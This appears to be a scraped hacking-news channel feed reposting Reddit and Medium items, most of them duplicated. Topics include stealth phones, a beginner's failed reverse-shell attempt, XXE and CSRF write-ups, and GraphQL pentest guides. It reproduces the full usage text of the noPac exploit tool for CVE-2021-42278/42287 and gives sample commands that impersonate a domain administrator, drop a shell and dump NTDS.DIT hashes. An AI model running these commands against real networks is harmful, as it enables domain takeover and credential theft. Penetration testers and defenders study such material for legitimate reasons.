Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
are stealth phones legit?
I'm looking for an untraceable (so not even able to use triangulation to find my location) phone and I stumbled across this stealth phone https://x-cellular.com/phones.html
Is this a scam or legit? I'm not sure if it's possible for a phone to have these features.
Thanks.
submitted by /u/JohnWilliams_94
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
are stealth phones legit?
I'm looking for an untraceable (so not even able to use triangulation to find my location) phone and I stumbled across this stealth phone https://x-cellular.com/phones.html
Is this a scam or legit? I'm not sure if it's possible for a phone to have these features.
Thanks.
submitted by /u/JohnWilliams_94
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
are stealth phones legit?
I'm looking for an untraceable (so not even able to use triangulation to find my location) phone and I stumbled across this stealth phone...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Introducing Logray | The Future of Packet Analysis
https://external-preview.redd.it/hVIoge-xPMYJmLV2cauKinnuIDqPkxGZvN3hxsMfg_I.jpg?width=320&crop=smart&auto=webp&s=86429f27ba5d6413f14d1723dbf5bc27018a483a submitted by /u/haveitall
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Introducing Logray | The Future of Packet Analysis
https://external-preview.redd.it/hVIoge-xPMYJmLV2cauKinnuIDqPkxGZvN3hxsMfg_I.jpg?width=320&crop=smart&auto=webp&s=86429f27ba5d6413f14d1723dbf5bc27018a483a submitted by /u/haveitall
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Introducing Logray | The Future of Packet Analysis
Posted in r/hacking by u/haveitall • 1 point and 0 comments
hacking: security in practice
Why do i get this error when i try to get a reverse shell on windows
I am kinda new to this so sorry if this isnt clear.
i run kali on vbox and listen to a specific port with netcat. then i run a command from this git hub page
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell (scroll all the way down)
and i get this error
ConPtyShellException: [-] ConPtyShellException: WSAConnect failed with error code: 10060
at ConPtyShell.connectRemote(String remoteIp, Int32 remotePort)
at ConPtyShell.SpawnConPtyShell(String remoteIp, Int32 remotePort, UInt32 rows, UInt32 cols, String commandLine, Boolean upgradeShell)
at ConPtyShellMainClass.ConPtyShellMain(String[] args)
i run the command on the same computer as the vmbox. I thought i might be getting this issue because i am running it on the same computer but i tried it on a different one and i got the same error. does anyone know why this happens and how i can fix it
submitted by /u/zuzzeler
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Why do i get this error when i try to get a reverse shell on windows
I am kinda new to this so sorry if this isnt clear.
i run kali on vbox and listen to a specific port with netcat. then i run a command from this git hub page
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell (scroll all the way down)
and i get this error
ConPtyShellException: [-] ConPtyShellException: WSAConnect failed with error code: 10060
at ConPtyShell.connectRemote(String remoteIp, Int32 remotePort)
at ConPtyShell.SpawnConPtyShell(String remoteIp, Int32 remotePort, UInt32 rows, UInt32 cols, String commandLine, Boolean upgradeShell)
at ConPtyShellMainClass.ConPtyShellMain(String[] args)
i run the command on the same computer as the vmbox. I thought i might be getting this issue because i am running it on the same computer but i tried it on a different one and i got the same error. does anyone know why this happens and how i can fix it
submitted by /u/zuzzeler
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Why do i get this error when i try to get a reverse shell on windows
I am kinda new to this so sorry if this isnt clear. i run kali on vbox and listen to a specific port with netcat. then i run a command from this...
Exploiting Out-of-Band XXE in the Wild
https://0xmahmoudjo0.medium.com/exploiting-out-of-band-xxe-in-the-wild-16fc6dad9ee2?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://0xmahmoudjo0.medium.com/exploiting-out-of-band-xxe-in-the-wild-16fc6dad9ee2?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Exploiting Out-of-Band XXE in the Wild
Hello all, I hope you’re fine! Our story today is about one of the most interesting bugs I found, actually, it’s my first time finding this…
Hello all, I hope you’re fine! Our story today is about one of the most interesting bugs I found, actually, it’s my first time finding…Continue reading on Medium » (https://0xmahmoudjo0.medium.com/exploiting-out-of-band-xxe-in-the-wild-16fc6dad9ee2?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Exploiting Out-of-Band XXE in the Wild
Hello all, I hope you’re fine! Our story today is about one of the most interesting bugs I found, actually, it’s my first time finding this…
It was always hard to find GraphQL pentesting guides, so I decided to Create my own, I hope it helps, ENJOY,
https://www.reddit.com/r/Pentesting/comments/x78pb9/it_was_always_hard_to_find_graphql_pentesting/
Part 1: https://blog.escape.tech/pentest101/ Part 2: https://blog.escape.tech/pentesting102/ Part 3 (The Exploitation): https://blog.escape.tech/pentest103/ submitted by /u/MdotTIM (https://www.reddit.com/user/MdotTIM)
[link] (https://www.reddit.com/r/Pentesting/comments/x78pb9/it_was_always_hard_to_find_graphql_pentesting/) [comments] (https://www.reddit.com/r/Pentesting/comments/x78pb9/it_was_always_hard_to_find_graphql_pentesting/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/x78pb9/it_was_always_hard_to_find_graphql_pentesting/
Part 1: https://blog.escape.tech/pentest101/ Part 2: https://blog.escape.tech/pentesting102/ Part 3 (The Exploitation): https://blog.escape.tech/pentest103/ submitted by /u/MdotTIM (https://www.reddit.com/user/MdotTIM)
[link] (https://www.reddit.com/r/Pentesting/comments/x78pb9/it_was_always_hard_to_find_graphql_pentesting/) [comments] (https://www.reddit.com/r/Pentesting/comments/x78pb9/it_was_always_hard_to_find_graphql_pentesting/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
It was always hard to find GraphQL pentesting guides, so I decided...
Part 1: [https://blog.escape.tech/pentest101/](https://blog.escape.tech/pentest101/) Part 2:...
Exploiting Out-of-Band XXE in the Wild
Hello all, I hope you’re fine! Our story today is about one of the most interesting bugs I found, actually, it’s my first time finding…Continue reading on Medium »
Read more...
Hello all, I hope you’re fine! Our story today is about one of the most interesting bugs I found, actually, it’s my first time finding…Continue reading on Medium »
Read more...
noPac - Exploiting CVE-2021-42278 And CVE-2021-42287 To Impersonate DA From Standard Domain User
http://www.kitploit.com/2022/09/nopac-exploiting-cve-2021-42278-and-cve.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2022/09/nopac-exploiting-cve-2021-42278-and-cve.html
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user Changed from sam-the-admin (https://github.com/WazeHell/sam-the-admin).
Usage SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain
positional arguments:
[domain/]username[:password]
Account used to authenticate to DC.
optional arguments:
-h, --help show this help message and exit
--impersonate IMPERSONATE
target username that will be impersonated (thru S4U2Self) for quering the ST. Keep in mind this will only work if the identity provided in this scripts is allowed for delegation to the SPN specified
-domain-netbios NETBIOSNAME
Domain NetBIOS name. Required if the DC has multiple domains.
-target-name NEWNAME Target computer name, if not specified, will be random generated.
-new-pass PASSWORD Add new computer password, if not specified, will be random generated.
-old-pass PASSWORD Target computer password, use if you know the password of the target you input with -target-name.
-ol d-hash LMHASH:NTHASH
Target computer hashes, use if you know the hash of the target you input with -target-name.
-debug Turn DEBUG output ON
-ts Adds timestamp to every logging output
-shell Drop a shell via smbexec
-no-add Forcibly change the password of the target computer.
-create-child Current account have permission to CreateChild.
-dump Dump Hashs via secretsdump
-use-ldap Use LDAP instead of LDAPS
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos (https://www.kitploit.com/search/label/Kerberos) authentication. Grabs credentials (https://www.kitploit.com/search/label/Credentials) from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (https://www.kitploit.com/search/label/Authentication) (128 or 256 bits)
-dc-host hostname Hostname of the domain controller (https://www.kitploit.com/search/label/Domain%20Controller) to use. If ommited, the domain part (FQDN) specified in the account parameter will be used
-dc-ip ip IP of the domain controller to use. Useful if you can't translate the FQDN.specified in the account parameter will be used
execute options:
-port [destination port]
Destination port to connect to SMB Server
-mode {SERVER,SHARE} mode to use (default SHARE, SERVER needs root!)< br/> -share SHARE share where the output will be grabbed from (default ADMIN$)
-shell-type {cmd,powershell}
choose a command processor for the semi-interactive shell
-codec CODEC Sets encoding (https://www.kitploit.com/search/label/Encoding) used (codec) from the target's output (default "GBK").
-service-name service_name
The name of theservice used to trigger the payload
dump options:
-just-dc-user USERNAME
Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch
-just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)
-just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only)
-pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile data
-use r-status Display whether or not the user is disabled
-history Dump password history, and LSA secrets OldVal
-resumefile RESUMEFILE
___________________________
@hacking_Attack
@Hacking_Video
Usage SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain
positional arguments:
[domain/]username[:password]
Account used to authenticate to DC.
optional arguments:
-h, --help show this help message and exit
--impersonate IMPERSONATE
target username that will be impersonated (thru S4U2Self) for quering the ST. Keep in mind this will only work if the identity provided in this scripts is allowed for delegation to the SPN specified
-domain-netbios NETBIOSNAME
Domain NetBIOS name. Required if the DC has multiple domains.
-target-name NEWNAME Target computer name, if not specified, will be random generated.
-new-pass PASSWORD Add new computer password, if not specified, will be random generated.
-old-pass PASSWORD Target computer password, use if you know the password of the target you input with -target-name.
-ol d-hash LMHASH:NTHASH
Target computer hashes, use if you know the hash of the target you input with -target-name.
-debug Turn DEBUG output ON
-ts Adds timestamp to every logging output
-shell Drop a shell via smbexec
-no-add Forcibly change the password of the target computer.
-create-child Current account have permission to CreateChild.
-dump Dump Hashs via secretsdump
-use-ldap Use LDAP instead of LDAPS
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos (https://www.kitploit.com/search/label/Kerberos) authentication. Grabs credentials (https://www.kitploit.com/search/label/Credentials) from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (https://www.kitploit.com/search/label/Authentication) (128 or 256 bits)
-dc-host hostname Hostname of the domain controller (https://www.kitploit.com/search/label/Domain%20Controller) to use. If ommited, the domain part (FQDN) specified in the account parameter will be used
-dc-ip ip IP of the domain controller to use. Useful if you can't translate the FQDN.specified in the account parameter will be used
execute options:
-port [destination port]
Destination port to connect to SMB Server
-mode {SERVER,SHARE} mode to use (default SHARE, SERVER needs root!)< br/> -share SHARE share where the output will be grabbed from (default ADMIN$)
-shell-type {cmd,powershell}
choose a command processor for the semi-interactive shell
-codec CODEC Sets encoding (https://www.kitploit.com/search/label/Encoding) used (codec) from the target's output (default "GBK").
-service-name service_name
The name of theservice used to trigger the payload
dump options:
-just-dc-user USERNAME
Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch
-just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)
-just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only)
-pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile data
-use r-status Display whether or not the user is disabled
-history Dump password history, and LSA secrets OldVal
-resumefile RESUMEFILE
___________________________
@hacking_Attack
@Hacking_Video
GitHub
GitHub - safebuffer/sam-the-admin: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user - safebuffer/sam-the-admin
resume file name to resume NTDS.DIT session dump (only available to DRSUAPI approach). This file will also be used to keep updating the session's state
-use-vss Use the VSS method insead of default DRSUAPI
-exec-method [{smbexec,wmiexec,mmcexec}]
Remote exec method to use at target (only when using -use-vss). Default: smbexec
Note: If -host-name is not specified, the tool will automatically get the domain control hostname, please select the hostname of the host specified by -dc-ip. If --impersonate is not specified, the tool will randomly choose a doamin admin to exploit. Use ldaps by default, if you get ssl error, try add -use-ldap . GetST python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203
___________________________
@hacking_Attack
@Hacking_Video
-use-vss Use the VSS method insead of default DRSUAPI
-exec-method [{smbexec,wmiexec,mmcexec}]
Remote exec method to use at target (only when using -use-vss). Default: smbexec
Note: If -host-name is not specified, the tool will automatically get the domain control hostname, please select the hostname of the host specified by -dc-ip. If --impersonate is not specified, the tool will randomly choose a doamin admin to exploit. Use ldaps by default, if you get ssl error, try add -use-ldap . GetST python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203
___________________________
@hacking_Attack
@Hacking_Video
Auto get shell python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 -shell --impersonate administrator
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
All about: Cross-Site Request Forgery
https://sl4x0.medium.com/all-about-cross-site-request-forgery-2c5432201d99?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://sl4x0.medium.com/all-about-cross-site-request-forgery-2c5432201d99?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
All about: Cross-Site Request Forgery
What is CSRF?
What is CSRF?Continue reading on Medium » (https://sl4x0.medium.com/all-about-cross-site-request-forgery-2c5432201d99?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
All about: Cross-Site Request Forgery
What is CSRF?